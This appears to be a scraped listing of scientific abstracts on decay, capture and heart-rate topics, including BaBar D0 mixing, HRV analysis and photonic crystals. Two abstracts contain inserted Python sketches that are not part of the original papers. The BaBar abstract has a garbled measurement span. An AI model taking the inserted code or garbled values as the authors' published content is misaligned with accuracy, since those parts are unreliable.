Calderini, G; Carpinelli, M; Forti, F; Giorgi, M A; Lusiani, A; Marchiori, G; Martinez-Vidal, F; Morganti, M; Neri, N; Paoloni, E; Rama, M; Rizzo, G; Sandrelli, F; Walsh, J; Haire, M; Judd, D; Paick, K; Wagoner, D E; Danielson, N; Elmer, P; Lu, C; Miftakov, V; Olsen, J; Smith, A J S; Varnes, E W; Bellini, F; Cavoto, G; del Re, D; Faccini, R; Ferrarotto, F; Ferroni, F; Gaspero, M; Leonardi, E; Mazzoni, M A; Morganti, S; Pierini, M; Piredda, G; Safai Tehrani, F; Serra, M; Voena, C; Christ, S; Wagner, G; Waldi, R; Adye, T; De Groot, N; Franek, B; Geddes, N I; Gopal, G P; Olaiya, E O; Xella, S M; Aleksan, R; Emery, S; Gaidot, A; Ganzhur, S F; Giraud, P-F; Hamel de Monchenault, G; Kozanecki, W; Langer, M; London, G W; Mayer, B; Schott, G; Vasseur, G; Yeche, Ch; Zito, M; Purohit, M V; Weidemann, A W; Yumiceva, F X; Aston, D; Bartoldus, R; Berger, N; Boyarski, A M; Buchmueller, O L; Convery, M R; Coupal, D P; Dong, D; Dorfan, J; Dujmic, D; Dunwoodie, W; Field, R C; Glanzman, T; Gowdy, S J; Grauges-Pous, E; Hadig, T; Halyo, V; Hryn'ova, T; Innes, W R; Jessop, C P; Kelsey, M H; Kim, P; Kocian, M L; Langenegger, U; Leith, D W G S; Luitz, S; Luth, V; Lynch, H L; Marsiske, H; Menke, S; Messner, R; Muller, D R; O'Grady, C P; Ozcan, V E; Perazzo, A; Perl, M; Petrak, S; Ratcliff, B N; Robertson, S H; Roodman, A; Salnikov, A A; Schindler, R H; Schwiening, J; Simi, G; Snyder, A; Soha, A; Stelzer, J; Su, D; Sullivan, M K; Tanaka, H A; Va'vra, J; Wagner, S R; Weaver, M; Weinstein, A J R; Wisniewski, W J; Wright, D H; Young, C C; Burchat, P R; Meyer, T I; Roat, C; Ahmed, S; Ernst, J A; Bugg, W; Krishnamurthy, M; Spanier, S M; Eckmann, R; Kim, H; Ritchie, J L; Schwitters, R F; Izen, J M; Kitayama, I; Lou, X C; Ye, S; Bianchi, F; Bona, M; Gallo, F; Gamba, D; Borean, C; Bosisio, L; Della Ricca, G; Dittongo, S; Grancagnolo, S; Lanceri, L; Poropat, P; Vitale, L; Vuagnin, G; Panvini, R S; Banerjee, Sw; Brown, C M; Fortin, D; Jackson, P D; Kowalewski, R; Roney, J M; Band, H R; Dasu, S; Datta, M; Eichenbaum, A M; Hu, H; Johnson, J R; Liu, R; Lodovico, F Di; Mohapatra, A K; Pan, Y; Prepost, R; Sekula, S J; von Wimmersperg-Toeller, J H; Wu, J; Wu, S L; Yu, Z; Neal, H 2003-10-24 We present results of a search for D0-D(-)0 mixing and a measurement of R(D), the ratio of doubly Cabibbo-suppressed decays to Cabibbo-favored decays, using 
D0-->K+pi- decays from 57.1 fb(-1) of data collected near sqrt[s]=10.6 GeV with the BABAR detector at the PEP-II collider. At the 95% confidence level, allowing for CP violation, we find the mixing parameters x('2)<0.0022 and -0.056rate R(M)<0.16%. In the limit of no mixing, R(D)=[0.357+/-0.022(stat)+/-0.027(syst)]% and the CP-violating asymmetry A(D)=0.095+/-0.061(stat)+/-0.083(syst). 2. Search for D0-D¯0 Mixing and a Measurement of the Doubly Cabibbo-Suppressed Decay Rate in D0→Kπ Decays Aubert, B.; Barate, R.; Boutigny, D.; Gaillard, J.-M.; Hicheur, A.; Karyotakis, Y.; Lees, J. P.; Robbe, P.; Tisserand, V.; Zghiche, A.; Palano, A.; Pompili, A.; Chen, J. C.; Qi, N. D.; Rong, G.; Wang, P.; Zhu, Y. S.; Eigen, G.; Ofte, I.; Stugu, B.; Abrams, G. S.; Borgland, A. W.; Breon, A. B.; Brown, D. N.; Button-Shafer, J.; Cahn, R. N.; Charles, E.; Day, C. T.; Gill, M. S.; Gritsan, A. V.; Groysman, Y.; Jacobsen, R. G.; Kadel, R. W.; Kadyk, J.; Kerth, L. T.; Kolomensky, Yu. G.; Kral, J. F.; Kukartsev, G.; Leclerc, C.; Levi, M. E.; Lynch, G.; Mir, L. M.; Oddone, P. J.; Orimoto, T. J.; Pripstein, M.; Roe, N. A.; Romosan, A.; Ronan, M. T.; Shelkov, V. G.; Telnov, A. V.; Wenzel, W. A.; Harrison, T. J.; Hawkes, C. M.; Knowles, D. J.; Penny, R. C.; Watson, A. T.; Watson, N. K.; Deppermann, T.; Goetzen, K.; Koch, H.; Lewandowski, B.; Pelizaeus, M.; Peters, K.; Schmuecker, H.; Steinke, M.; Barlow, N. R.; Bhimji, W.; Boyd, J. T.; Chevalier, N.; Cottingham, W. N.; Mackay, C.; Wilson, F. F.; Hearty, C.; Mattison, T. S.; McKenna, J. A.; Thiessen, D.; Kyberd, P.; McKemey, A. K.; Blinov, V. E.; Bukin, A. D.; Golubev, V. B.; Ivanchenko, V. N.; Kravchenko, E. A.; Onuchin, A. P.; Serednyakov, S. I.; Skovpen, Yu. I.; Solodov, E. P.; Yushkov, A. N.; Best, D.; Chao, M.; Kirkby, D.; Lankford, A. J.; Mandelkern, M.; McMahon, S.; Mommsen, R. K.; Roethel, W.; Stoker, D. P.; Buchanan, C.; Hadavand, H. K.; Hill, E. J.; Macfarlane, D. B.; Paar, H. P.; Rahatlou, Sh.; Schwanke, U.; Sharma, V.; Berryhill, J. W.; Campagnari, C.; Dahmes, B.; Kuznetsova, N.; Levy, S. L.; Long, O.; Lu, A.; Mazur, M. A.; Richman, J. D.; Verkerke, W.; Beringer, J.; Eisner, A. M.; Grothe, M.; Heusch, C. A.; Lockman, W. S.; Schalk, T.; Schmitz, R. E.; Schumm, B. A.; Seiden, A.; Turri, M.; Walkowiak, W.; Williams, D. C.; Wilson, M. G.; Albert, J.; Chen, E.; Dorsten, M. P.; Dubois-Felsmann, G. P.; Dvoretskii, A.; Hitlin, D. G.; Narsky, I.; Porter, F. C.; Ryd, A.; Samuel, A.; Yang, S.; Jayatilleke, S.; Mancinelli, G.; Meadows, B. T.; Sokoloff, M. D.; Barillari, T.; Blanc, F.; Bloom, P.; Clark, P. J.; Ford, W. T.; Nauenberg, U.; Olivas, A.; Rankin, P.; Roy, J.; Smith, J. G.; van Hoek, W. C.; Zhang, L.; Harton, J. L.; Hu, T.; Soffer, A.; Toki, W. H.; Wilson, R. J.; Zhang, J.; Altenburg, D.; Brandt, T.; Brose, J.; Colberg, T.; Dickopp, M.; Dubitzky, R. S.; Hauke, A.; Lacker, H. M.; Maly, E.; Müller-Pfefferkorn, R.; Nogowski, R.; Otto, S.; Schubert, K. R.; Schwierz, R.; Spaan, B.; Wilden, L.; Bernard, D.; Bonneaud, G. R.; Brochard, F.; Cohen-Tanugi, J.; Thiebaux, Ch.; Vasileiadis, G.; Verderi, M.; Khan, A.; Lavin, D.; Muheim, F.; Playfer, S.; Swain, J. E.; Tinslay, J.; Bozzi, C.; Piemontese, L.; Sarti, A.; Treadwell, E.; Anulli, F.; Baldini-Ferroli, R.; Calcaterra, A.; de Sangro, R.; Falciai, D.; Finocchiaro, G.; Patteri, P.; Peruzzi, I. M.; Piccolo, M.; Zallo, A.; Buzzo, A.; Contri, R.; Crosetti, G.; Vetere, M. Lo; Macri, M.; Monge, M. R.; Passaggio, S.; Pastore, F. C.; Patrignani, C.; Robutti, E.; Santroni, A.; Tosi, S.; Bailey, S.; Morii, M.; Grenier, G. 
J.; Lee, S.-J.; Mallik, U.; Cochran, J.; Crawley, H. B.; Lamsa, J.; Meyer, W. T.; Prell, S.; Rosenberg, E. I.; Yi, J.; Davier, M.; Grosdidier, G.; Höcker, A.; Laplace, S.; Le Diberder, F.; Lepeltier, V.; Lutz, A. M.; Petersen, T. C.; Plaszczynski, S.; Schune, M. H.; Tantot, L.; Wormser, G.; Bionta, R. M.; Brigljević, V.; Cheng, C. H.; Lange, D. J.; Wright, D. M.; Bevan, A. J.; Fry, J. R.; Gabathuler, E.; Gamet, R.; Kay, M.; Payne, D. J.; Sloane, R. J.; Touramanis, C.; Aspinwall, M. L.; Bowerman, D. A.; Dauncey, P. D.; Egede, U.; Eschrich, I.; Morton, G. W.; Nash, J. A.; Sanders, P.; Taylor, G. P.; Back, J. J.; Bellodi, G.; Harrison, P. F.; Shorthouse, H. W.; Strother, P.; Vidal, P. B.; Cowan, G.; Flaecher, H. U.; George, S.; Green, M. G.; Kurup, A.; Marker, C. E.; McMahon, T. R.; Ricciardi, S.; Salvatore, F.; Vaitsas, G.; Winter, M. A.; Brown, D.; Davis, C. L.; Allison, J.; Barlow, R. J.; Forti, A. C.; Hart, P. A.; Jackson, F.; Lafferty, G. D.; Lyon, A. J.; Weatherall, J. H.; Williams, J. C.; Farbin, A.; Jawahery, A.; Kovalskyi, D.; Lae, C. K.; Lillard, V.; Roberts, D. A.; Blaylock, G.; Dallapiccola, C.; Flood, K. T.; Hertzbach, S. S.; Kofler, R.; Koptchev, V. B.; Moore, T. B.; Staengle, H.; Willocq, S.; Cowan, R.; Sciolla, G.; Taylor, F.; Yamamoto, R. K.; Mangeol, D. J.; Milek, M.; Patel, P. M.; Lazzaro, A.; Palombo, F.; Bauer, J. M.; Cremaldi, L.; Eschenburg, V.; Godang, R.; Kroeger, R.; Reidy, J.; Sanders, D. A.; Summers, D. J.; Zhao, H. W.; Hast, C.; Taras, P.; Nicholson, H.; Cartaro, C.; Cavallo, N.; de Nardo, G.; Fabozzi, F.; Gatto, C.; Lista, L.; Paolucci, P.; Piccolo, D.; Sciacca, C.; Baak, M. A.; Raven, G.; Losecco, J. M.; Gabriel, T. A.; Brau, B.; Pulliam, T.; Brau, J.; Frey, R.; Iwasaki, M.; Potter, C. T.; Sinev, N. B.; Strom, D.; Torrence, E.; Colecchia, F.; Dorigo, A.; Galeazzi, F.; Margoni, M.; Morandin, M.; Posocco, M.; Rotondo, M.; Simonetto, F.; Stroili, R.; Tiozzo, G.; Voci, C.; Benayoun, M.; Briand, H.; Chauveau, J.; David, P.; de La Vaissière, Ch.; del Buono, L.; Hamon, O.; Leruste, Ph.; Ocariz, J.; Pivk, M.; Roos, L.; Stark, J.; T'jampens, S.; Manfredi, P. F.; Re, V.; Gladney, L.; Guo, Q. H.; Panetta, J.; Angelini, C.; Batignani, G.; Bettarini, S.; Bondioli, M.; Bucci, F.; Calderini, G.; Carpinelli, M.; Forti, F.; Giorgi, M. A.; Lusiani, A.; Marchiori, G.; Martinez-Vidal, F.; Morganti, M.; Neri, N.; Paoloni, E.; Rama, M.; Rizzo, G.; Sandrelli, F.; Walsh, J.; Haire, M.; Judd, D.; Paick, K.; Wagoner, D. E.; Danielson, N.; Elmer, P.; Lu, C.; Miftakov, V.; Olsen, J.; Smith, A. J.; Varnes, E. W.; Bellini, F.; Cavoto, G.; del Re, D.; Faccini, R.; Ferrarotto, F.; Ferroni, F.; Gaspero, M.; Leonardi, E.; Mazzoni, M. A.; Morganti, S.; Pierini, M.; Piredda, G.; Tehrani, F. Safai; Serra, M.; Voena, C.; Christ, S.; Wagner, G.; Waldi, R.; Adye, T.; de Groot, N.; Franek, B.; Geddes, N. I.; Gopal, G. P.; Olaiya, E. O.; Xella, S. M.; Aleksan, R.; Emery, S.; Gaidot, A.; Ganzhur, S. F.; Giraud, P.-F.; de Monchenault, G. Hamel; Kozanecki, W.; Langer, M.; London, G. W.; Mayer, B.; Schott, G.; Vasseur, G.; Yeche, Ch.; Zito, M.; Purohit, M. V.; Weidemann, A. W.; Yumiceva, F. X.; Aston, D.; Bartoldus, R.; Berger, N.; Boyarski, A. M.; Buchmueller, O. L.; Convery, M. R.; Coupal, D. P.; Dong, D.; Dorfan, J.; Dujmic, D.; Dunwoodie, W.; Field, R. C.; Glanzman, T.; Gowdy, S. J.; Grauges-Pous, E.; Hadig, T.; Halyo, V.; Hryn'ova, T.; Innes, W. R.; Jessop, C. P.; Kelsey, M. H.; Kim, P.; Kocian, M. L.; Langenegger, U.; Leith, D. W.; Luitz, S.; Luth, V.; Lynch, H. 
L.; Marsiske, H.; Menke, S.; Messner, R.; Muller, D. R.; O'Grady, C. P.; Ozcan, V. E.; Perazzo, A.; Perl, M.; Petrak, S.; Ratcliff, B. N.; Robertson, S. H.; Roodman, A.; Salnikov, A. A.; Schindler, R. H.; Schwiening, J.; Simi, G.; Snyder, A.; Soha, A.; Stelzer, J.; Su, D.; Sullivan, M. K.; Tanaka, H. A.; Va'Vra, J.; Wagner, S. R.; Weaver, M.; Weinstein, A. J.; Wisniewski, W. J.; Wright, D. H.; Young, C. C.; Burchat, P. R.; Meyer, T. I.; Roat, C.; Ahmed, S.; Ernst, J. A.; Bugg, W.; Krishnamurthy, M.; Spanier, S. M.; Eckmann, R.; Kim, H.; Ritchie, J. L.; Schwitters, R. F.; Izen, J. M.; Kitayama, I.; Lou, X. C.; Ye, S.; Bianchi, F.; Bona, M.; Gallo, F.; Gamba, D.; Borean, C.; Bosisio, L.; Della Ricca, G.; Dittongo, S.; Grancagnolo, S.; Lanceri, L.; Poropat, P.; Vitale, L.; Vuagnin, G.; Panvini, R. S.; Banerjee, Sw.; Brown, C. M.; Fortin, D.; Jackson, P. D.; Kowalewski, R.; Roney, J. M.; Band, H. R.; Dasu, S.; Datta, M.; Eichenbaum, A. M.; Hu, H.; Johnson, J. R.; Liu, R.; Di Lodovico, F.; Mohapatra, A. K.; Pan, Y.; Prepost, R.; Sekula, S. J.; von Wimmersperg-Toeller, J. H.; Wu, J.; Wu, S. L.; Yu, Z.; Neal, H. 2003-10-01 We present results of a search for D0-D¯0 mixing and a measurement of RD, the ratio of doubly Cabibbo-suppressed decays to Cabibbo-favored decays, using D0→K+π- decays from 57.1 fb-1 of data collected near (s)=10.6 GeV with the BABAR detector at the PEP-II collider. At the 95% confidence level, allowing for CP violation, we find the mixing parameters x'2<0.0022 and -0.056rate RM<0.16%. In the limit of no mixing, RD=[0.357±0.022(stat)±0.027(syst)]% and the CP-violating asymmetry AD=0.095±0.061(stat)±0.083(syst). 3. Role of the bound-state wave function in capture-loss rates: Slow proton in an electron gas SciTech Connect Alducin, M.; Nagy, I. 2003-07-01 Capture and loss rates for protons moving in an electron gas are calculated using many-body perturbation theory. The role of the form of the bound-state wave function for weakly bound states around the proton is analyzed. We find significant differences (up to a factor of 2 higher) in the values of Auger capture and loss rates when using Hulthen-type instead of hydrogenic wave functions. Its relevance in stopping power is briefly discussed. 4. Toward Capturing Momentary Changes of Heart Rate Variability by a Dynamic Analysis Method. PubMed Zhang, Haoshi; Zhu, Mingxing; Zheng, Yue; Li, Guanglin 2015-01-01 The analysis of heart rate variability (HRV) has been performed on long-term electrocardiography (ECG) recordings (12~24 hours) and short-term recordings (2~5 minutes), which may not capture momentary change of HRV. In this study, we present a new method to analyze the momentary HRV (mHRV). The ECG recordings were segmented into a series of overlapped HRV analysis windows with a window length of 5 minutes and different time increments. The performance of the proposed method in delineating the dynamics of momentary HRV measurement was evaluated with four commonly used time courses of HRV measures on both synthetic time series and real ECG recordings from human subjects and dogs. Our results showed that a smaller time increment could capture more dynamical information on transient changes. Considering a too short increment such as 10 s would cause the indented time courses of the four measures, a 1-min time increment (4-min overlapping) was suggested in the analysis of mHRV in the study. ECG recordings from human subjects and dogs were used to further assess the effectiveness of the proposed method. 
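To make the overlapping-window segmentation just described concrete, the following minimal Python sketch computes a simple time-domain HRV measure (SDNN) over 5-min windows advanced in 1-min steps, the values suggested in the abstract; the array name rr_intervals and the synthetic data are illustrative assumptions, not the authors' implementation.

import numpy as np

def momentary_hrv(rr_intervals, window_s=300.0, step_s=60.0):
    # Compute SDNN over overlapping windows of an RR-interval series.
    # rr_intervals: 1-D array of consecutive RR intervals in seconds (hypothetical input).
    rr = np.asarray(rr_intervals, dtype=float)
    beat_times = np.cumsum(rr)                  # time of each beat from the start
    starts, sdnn = [], []
    t = 0.0
    while t + window_s <= beat_times[-1]:
        mask = (beat_times >= t) & (beat_times < t + window_s)
        if mask.sum() > 1:
            starts.append(t)
            sdnn.append(np.std(rr[mask], ddof=1) * 1000.0)  # SDNN in ms
        t += step_s                             # 1-min increment -> 4-min overlap
    return np.array(starts), np.array(sdnn)

# Synthetic example: ~70 bpm with mild variability over roughly 20 minutes
rng = np.random.default_rng(0)
rr = 0.86 + 0.05 * rng.standard_normal(1400)
times, sdnn = momentary_hrv(rr)
print(times[:3], sdnn[:3])

Shorter steps trade statistical stability within each window for finer temporal resolution, which is the trade-off the abstract describes.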
The pilot study demonstrated that the proposed analysis of mHRV could provide more accurate assessment of the dynamical changes in cardiac activity than the conventional measures of HRV (without time overlapping). The proposed method may provide an efficient means in delineating the dynamics of momentary HRV and it would be worthy performing more investigations. 5. Toward Capturing Momentary Changes of Heart Rate Variability by a Dynamic Analysis Method PubMed Central Zhang, Haoshi; Zhu, Mingxing; Zheng, Yue; Li, Guanglin 2015-01-01 The analysis of heart rate variability (HRV) has been performed on long-term electrocardiography (ECG) recordings (12~24 hours) and short-term recordings (2~5 minutes), which may not capture momentary change of HRV. In this study, we present a new method to analyze the momentary HRV (mHRV). The ECG recordings were segmented into a series of overlapped HRV analysis windows with a window length of 5 minutes and different time increments. The performance of the proposed method in delineating the dynamics of momentary HRV measurement was evaluated with four commonly used time courses of HRV measures on both synthetic time series and real ECG recordings from human subjects and dogs. Our results showed that a smaller time increment could capture more dynamical information on transient changes. Considering a too short increment such as 10 s would cause the indented time courses of the four measures, a 1-min time increment (4-min overlapping) was suggested in the analysis of mHRV in the study. ECG recordings from human subjects and dogs were used to further assess the effectiveness of the proposed method. The pilot study demonstrated that the proposed analysis of mHRV could provide more accurate assessment of the dynamical changes in cardiac activity than the conventional measures of HRV (without time overlapping). The proposed method may provide an efficient means in delineating the dynamics of momentary HRV and it would be worthy performing more investigations. PMID:26172953 6. Two-dimensional treatment of the level shift and decay rate in photonic crystals SciTech Connect Fussell, D.P.; McPhedran, R.C.; Martijn de Sterke, C. 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment - the 2D LDOS in a finite PC - with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC's. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 7. Two-dimensional treatment of the level shift and decay rate in photonic crystals. PubMed Fussell, D P; McPhedran, R C; Martijn de Sterke, C 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. 
The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment--the 2D LDOS in a finite PC--with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC's. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 8. Size and shape dependent photoluminescence and excited state decay rates of diamondoids. PubMed Richter, Robert; Wolter, David; Zimmermann, Tobias; Landt, Lasse; Knecht, Andre; Heidrich, Christoph; Merli, Andrea; Dopfer, Otto; Reiss, Philipp; Ehresmann, Arno; Petersen, Jens; Dahl, Jeremy E; Carlson, Robert M K; Bostedt, Christoph; Möller, Thomas; Mitric, Roland; Rander, Torbjörn 2014-02-21 We present photoluminescence spectra and excited state decay rates of a series of diamondoids, which represent molecular structural analogues to hydrogen-passivated bulk diamond. Specific isomers of the five smallest diamondoids (adamantane-pentamantane) have been brought into the gas phase and irradiated with synchrotron radiation. All investigated compounds show intrinsic photoluminescence in the ultraviolet spectral region. The emission spectra exhibit pronounced vibrational fine structure which is analyzed using quantum chemical calculations. We show that the geometrical relaxation of the first excited state of adamantane, exhibiting Rydberg character, leads to the loss of Td symmetry. The luminescence of adamantane is attributed to a transition from the delocalized first excited state into different vibrational modes of the electronic ground state. Similar geometrical changes of the excited state structure have also been identified in the other investigated diamondoids. The excited state decay rates show a clear dependence on the size of the diamondoid, but are independent of the particle geometry, further indicating a loss of particle symmetry upon electronic excitation. 9. Two-dimensional treatment of the level shift and decay rate in photonic crystals Fussell, D. P.; McPhedran, R. C.; Martijn de Sterke, C. 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment—the 2D LDOS in a finite PC—with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC’s. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 10. 
Sensitivity of β-decay rates to the radial dependence of the nucleon effective mass Severyukhin, A. P.; Margueron, J.; Borzov, I. N.; Van Giai, N. 2015-03-01 We analyze the sensitivity of β-decay rates in 78Ni and 100,132Sn to a correction term in Skyrme energy-density functionals (EDFs) which modifies the radial shape of the nucleon effective mass. This correction is added on top of several Skyrme parametrizations which are selected from their effective mass properties and predictions about the stability properties of 132Sn. The impact of the correction on high-energy collective modes is shown to be moderate. From the comparison of the effects induced by the surface-peaked effective mass in the three doubly magic nuclei, it is found that 132Sn is largely impacted by the correction, while 78Ni and 100Sn are only moderately affected. We conclude that β-decay rates in these nuclei can be used as a test of different parts of the nuclear EDF: 78Ni and 100Sn are mostly sensitive to the particle-hole interaction through the B(GT) values, while 132Sn is sensitive to the radial shape of the effective mass. Possible improvements of these different parts could therefore be better constrained in the future. 11. Neutron capture production rates of cosmogenic 60Co, 59Ni and 36Cl in stony meteorites NASA Technical Reports Server (NTRS) Spergel, M. S.; Reedy, R. C.; Lazareth, O. W.; Levy, P. W. 1986-01-01 Results for neutron flux calculations in stony meteoroids (of various radii and compositions) and production rates for Cl-36, Ni-59, and Co-60 are reported. The Ni-59/Co-60 ratio is nearly constant with depth in most meteorites: this effect is consistent with the neutron flux and capture cross section properties. The shape of the neutron flux energy spectrum varies little with depth in a meteorite. The size of the parent meteorite can be determined from one of its fragments, using the Ni-59/Co-60 ratios, if the parent meteorite was less than 75 g/cm(2) in radius. If the parent meteorite was larger, a lower limit on the size of the parent meteorite can be determined from a fragment. In C3 chondrites this is not possible. In stony meteorites with R less than 50 g/cm(2) (mass less than 4 kg), the calculated Co-60 production rates are below 1 atom/min g-Co. The highest Co-60 production rates occur in stony meteorites with radius about 250 g/cm(2) (1.4 m across). In meteorites with radii greater than 400 g/cm(2), the maximum Co-60 production rate occurs at a depth of about 175 g/cm(2) in L-chondrite, 125 g/cm(2) in C3 chondrite, and 190 g/cm(2) in aubrites. 12. Lepton-violating β-β-, β+β+ decays, (e-, e+) conversion and double electron capture in gauge theories 1983-05-01 The lepton-violating processes β-β-, β+β+, (e-, e+) and double electron capture have been investigated in the context of modern gauge theories. Mechanisms involving light or heavy intermediate Majorana neutrinos, with or without right-handed currents, as well as Higgs particles, have been studied. The lepton-violating emission of light bosons, recently proposed by Georgi, Glashow and Nussinov, has also been analyzed. From the analysis of the 48Ca → 48Ti data the following limits emerge: |⟨m_ν⟩| < 80 eV, m_N > (2-20) × 10^3 GeV, m_{W_R} > 400 GeV, and g_{ν_e ν̄_e χ^0} < 5 × 10^-3. The above limits are then used to predict the lifetimes for β+β+, (e-, e+) and double electron capture in the A = 58, 92 and 96 systems employing realistic nuclear models. 13.
New results for reaction rate of the proton radiative capture on 3H Dubovichenko, S. B.; Dzhazairov-Kakhramanov, A. V.; Afanasyeva, N. V. 2017-07-01 Calculations of the reaction rate of the proton radiative capture on 3H at temperatures from 0.01 T9 up to 5 T9, which are based on the theoretical results for the astrophysical S-factor and take into account the latest experimental data, were carried out. Theoretical results for the S-factor at energies from 1 keV up to 5 MeV were obtained in the framework of the modified potential cluster model with the classification of orbital states according to Young tableaux. On the basis of the nuclear model used for the interaction of p and 3H particles, it was shown that the latest experimental data for the S-factor can be described over the energy range from 50 keV up to 5 MeV. 14. Simultaneous use of mark-recapture and radiotelemetry to estimate survival, movement, and capture rates USGS Publications Warehouse Powell, L.A.; Conroy, M.J.; Hines, J.E.; Nichols, J.D.; Krementz, D.G. 2000-01-01 Biologists often estimate separate survival and movement rates from radio-telemetry and mark-recapture data from the same study population. We describe a method for combining these data types in a single model to obtain joint, potentially less biased estimates of survival and movement that use all available data. We furnish an example using wood thrushes (Hylocichla mustelina) captured at the Piedmont National Wildlife Refuge in central Georgia in 1996. The model structure allows estimation of survival and capture probabilities, as well as estimation of movements away from and into the study area. In addition, the model structure provides many possibilities for hypothesis testing. Using the combined model structure, we estimated that wood thrush weekly survival was 0.989 ± 0.007 (±SE). Survival rates of banded and radio-marked individuals were not different (alpha hat [S_radioed, S_banded] = log[S hat_radioed / S hat_banded] = 0.0239 ± 0.0435). Fidelity rates (weekly probability of remaining in a stratum) did not differ between geographic strata (psi hat = 0.911 ± 0.020; alpha hat [psi11, psi22] = 0.0161 ± 0.047), and recapture rates (p hat = 0.097 ± 0.016) of banded and radio-marked individuals were not different (alpha hat [p_radioed, p_banded] = 0.145 ± 0.655). Combining these data types in a common model resulted in more precise estimates of movement and recapture rates than separate estimation, but the ability to detect stratum- or mark-specific differences in parameters was weak. We conducted simulation trials to investigate the effects of varying study designs on parameter accuracy and statistical power to detect important differences. Parameter accuracy was high (relative bias [RBIAS] <2%) and confidence interval coverage close to nominal, except for survival estimates of banded birds for the 'off study area' stratum, which were negatively biased (RBIAS -7 to -15%) when sample sizes were small (5-10 banded or radioed animals 'released' per time interval). To provide 15. Can a first-order exponential decay model fit heart rate recovery after resistance exercise? PubMed Bartels-Ferreira, Rhenan; de Sousa, Élder D; Trevizani, Gabriela A; Silva, Lilian P; Nakamura, Fábio Y; Forjaz, Cláudia L M; Lima, Jorge Roberto P; Peçanha, Tiago 2015-03-01 The time constant of postexercise heart rate recovery (HRRτ), obtained by fitting the heart rate decay curve with a first-order exponential function, has been used to assess cardiac autonomic recovery after endurance exercise.
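A minimal sketch of such a first-order exponential fit is given below, using the model HR(t) = HR_end + A·exp(−t/τ) and reporting τ together with the R² goodness-of-fit index; the arrays, starting values, and the roughly 420 s synthetic window (echoing the monitoring length suggested later in the abstract) are illustrative assumptions, not the authors' code.

import numpy as np
from scipy.optimize import curve_fit

def mono_exp(t, hr_end, amplitude, tau):
    # First-order (mono)exponential recovery model: HR(t) = HR_end + A*exp(-t/tau)
    return hr_end + amplitude * np.exp(-t / tau)

def fit_hrr(t, hr):
    # Fit the monoexponential model and return (tau, R^2).
    p0 = [hr.min(), hr.max() - hr.min(), 60.0]       # rough starting guesses
    popt, _ = curve_fit(mono_exp, t, hr, p0=p0, maxfev=10000)
    residuals = hr - mono_exp(t, *popt)
    ss_res = np.sum(residuals ** 2)
    ss_tot = np.sum((hr - hr.mean()) ** 2)
    return popt[2], 1.0 - ss_res / ss_tot

# Synthetic example: recovery from ~150 to ~80 bpm with tau = 70 s plus noise
t = np.arange(0.0, 420.0, 1.0)
hr = 80.0 + 70.0 * np.exp(-t / 70.0) + np.random.normal(0.0, 2.0, t.size)
tau, r2 = fit_hrr(t, hr)
print(f"HRR tau = {tau:.1f} s, R^2 = {r2:.3f}")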
The feasibility of this model was not tested after resistance exercise (RE). The aim of this study was to test the goodness of fit of the first-order exponential decay model to fit heart rate recovery (HRR) after RE. Ten healthy subjects participated in the study. The experimental sessions occurred in two separated days and consisted of performance of 1 set of 10 repetitions at 50% or 80% of the load achieved on the one-repetition maximum test [low-intensity (LI) and high-intensity (HI) sessions, respectively]. Heart rate (HR) was continuously registered before and during exercise and also for 10 min of recovery. A monoexponential equation was used to fit the HRR curve during the postexercise period using different time windows (i.e. 30, 60, 90, … 600 s). For each time window, (i) HRRτ was calculated and (ii) variation of HR explained by the model (R(2) goodness of fit index) was assessed. The HRRτ showed stabilization from 360 and 420 s on LI and HI, respectively. Acceptable R(2) values were observed from the 360 s on LI (R(2) > 0.65) and at all tested time windows on HI (R(2) > 0.75). In conclusion, this study showed that using a minimum length of monitoring (~420 s) HRR after RE can be adequately modelled by a first-order exponential fitting. © 2014 Scandinavian Society of Clinical Physiology and Nuclear Medicine. Published by John Wiley & Sons Ltd. 16. Mixture models for estimating the size of a closed population when capture rates vary among individuals USGS Publications Warehouse Dorazio, R.M.; Royle, J. Andrew 2003-01-01 We develop a parameterization of the beta-binomial mixture that provides sensible inferences about the size of a closed population when probabilities of capture or detection vary among individuals. Three classes of mixture models (beta-binomial, logistic-normal, and latent-class) are fitted to recaptures of snowshoe hares for estimating abundance and to counts of bird species for estimating species richness. In both sets of data, rates of detection appear to vary more among individuals (animals or species) than among sampling occasions or locations. The estimates of population size and species richness are sensitive to model-specific assumptions about the latent distribution of individual rates of detection. We demonstrate using simulation experiments that conventional diagnostics for assessing model adequacy, such as deviance, cannot be relied on for selecting classes of mixture models that produce valid inferences about population size. Prior knowledge about sources of individual heterogeneity in detection rates, if available, should be used to help select among classes of mixture models that are to be used for inference. 17. Initial measurements of O-ion and He-ion decay rates observed from the Van Allen probes RBSPICE instrument PubMed Central 